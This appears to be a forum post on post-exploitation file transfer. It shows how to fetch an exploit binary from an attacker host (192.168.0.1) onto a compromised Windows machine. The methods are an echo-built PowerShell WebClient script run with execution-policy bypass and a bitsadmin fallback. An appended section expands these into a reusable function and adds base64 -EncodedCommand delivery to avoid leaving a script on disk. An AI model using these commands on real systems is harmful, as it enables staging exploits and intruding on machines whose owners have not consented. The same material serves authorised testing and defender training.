06-29-2016, 11:07 AM
Assumptions:
1) You got access on a Windows system which supports PowerShell and bitsadmin.
Please note that bitsadmin is no longer supported on Windows; instead of bitsadmin we can use PowerShell.
Execute the following commands in the target machine's limited shell:
REM build wget.ps1 line by line; the first echo uses > to create the file, the rest use >> to append
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://192.168.0.1/winExp.exe" >> wget.ps1
REM $file is the destination path; PowerShell expands $storageDir when the script runs
echo $file = "$storageDir\winExp.exe" >> wget.ps1
echo $webclient.DownloadFile($url, $file) >> wget.ps1
Now our wget.ps1 is ready for action, i.e. it should now help the attacker transfer the exploit to the target Windows machine.
You can cross-verify wget.ps1 using the TYPE command.
Now let's download the file using the PowerShell command given below.
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
In some other cases, lower versions of Windows don't support PowerShell. In that case you can use the bitsadmin utility to download the file into the target machine's directory.
bitsadmin /transfer myDownloadJob http://192.168.0.1/winExp.exe c:\Users\g4h\Desktop1.exe
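The whole procedure above (WebClient download from PowerShell, bitsadmin as the fallback) in one script, as an added example that is not the original post's wget.ps1. The URL and host 192.168.0.1 are taken from the post; the output file name, the BITS job name g4hJob, the optional SHA-256 value and the Get-RemoteFile / ConvertTo-EncodedCommand function names are this example's own assumptions. It also resolves the destination to an absolute path (bitsadmin and the BITS service reject relative ones), checks the transfer's exit code, and shows how to hand the same logic to powershell.exe with -EncodedCommand from a cmd shell instead of echo-ing a .ps1 to disk, which avoids both the cmd quoting pitfalls and an on-disk artifact.

```powershell
# Added example (not the original post's wget.ps1): same WebClient download, with the
# post's variable bugs fixed, an absolute destination path (BITS requires one), a
# bitsadmin.exe fallback, and an optional SHA-256 check on the result.
# Assumed values: URL/host from the post; output name, job name g4hJob and the hash
# are placeholders to replace for a real engagement.

function Get-RemoteFile {
    param(
        [Parameter(Mandatory = $true)][string]$Url,
        [Parameter(Mandatory = $true)][string]$OutFile,
        [string]$ExpectedSha256 = ''      # optional; leave empty to skip the check
    )

    # bitsadmin and the BITS service need a full path; a relative one is resolved
    # against the current directory (what the post's $storageDir = $pwd intended).
    if (-not [System.IO.Path]::IsPathRooted($OutFile)) {
        $OutFile = Join-Path $pwd.Path $OutFile
    }

    try {
        # Primary method: the same API the post uses, with the variable names fixed.
        $webclient = New-Object System.Net.WebClient
        $webclient.DownloadFile($Url, $OutFile)
    }
    catch {
        Write-Warning "WebClient failed ($($_.Exception.Message)); falling back to bitsadmin"
        # Fallback for hosts where WebClient is blocked; /priority foreground makes
        # the job run immediately instead of waiting for an idle network.
        & bitsadmin.exe /transfer g4hJob /priority foreground $Url $OutFile | Out-Null
        if ($LASTEXITCODE -ne 0 -or -not (Test-Path $OutFile)) {
            throw "bitsadmin transfer failed (exit code $LASTEXITCODE)"
        }
    }

    if ($ExpectedSha256) {
        # Hash via .NET so this also works on PowerShell 2/3 (Get-FileHash needs 4+).
        $sha = [System.Security.Cryptography.SHA256]::Create()
        $fs  = [System.IO.File]::OpenRead($OutFile)
        try     { $actual = ($sha.ComputeHash($fs) | ForEach-Object { $_.ToString('x2') }) -join '' }
        finally { $fs.Close() }
        if ($actual -ne $ExpectedSha256) {
            Remove-Item $OutFile -Force
            throw "hash mismatch: got $actual, expected $ExpectedSha256"
        }
    }
    return $OutFile
}

# Encodes a script for `powershell -EncodedCommand` (UTF-16LE base64, which is what
# powershell.exe expects), so the download logic can be passed from a cmd.exe shell
# without echo-ing a .ps1 to disk line by line.
function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory = $true)][string]$Script)
    return [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($Script))
}

# Usage (hash is a placeholder; drop -ExpectedSha256 if you have not computed it):
# Get-RemoteFile -Url 'http://192.168.0.1/winExp.exe' -OutFile 'winExp.exe' -ExpectedSha256 '<sha256 of winExp.exe>'
# $b64 = ConvertTo-EncodedCommand '(New-Object Net.WebClient).DownloadFile("http://192.168.0.1/winExp.exe", "$pwd\winExp.exe")'
# powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -EncodedCommand $b64
```

Two caveats a practitioner should keep in mind: -ExecutionPolicy Bypass is not a security boundary, so it works on any host where powershell.exe runs, but on modern Windows both the script block and the BITS job are logged (PowerShell operational log, BITS client event log), so the transfer is visible to a monitored target. On current Windows, bitsadmin is deprecated in favour of the BitsTransfer cmdlets (Start-BitsTransfer); the bitsadmin.exe fallback here is for the older hosts the post describes.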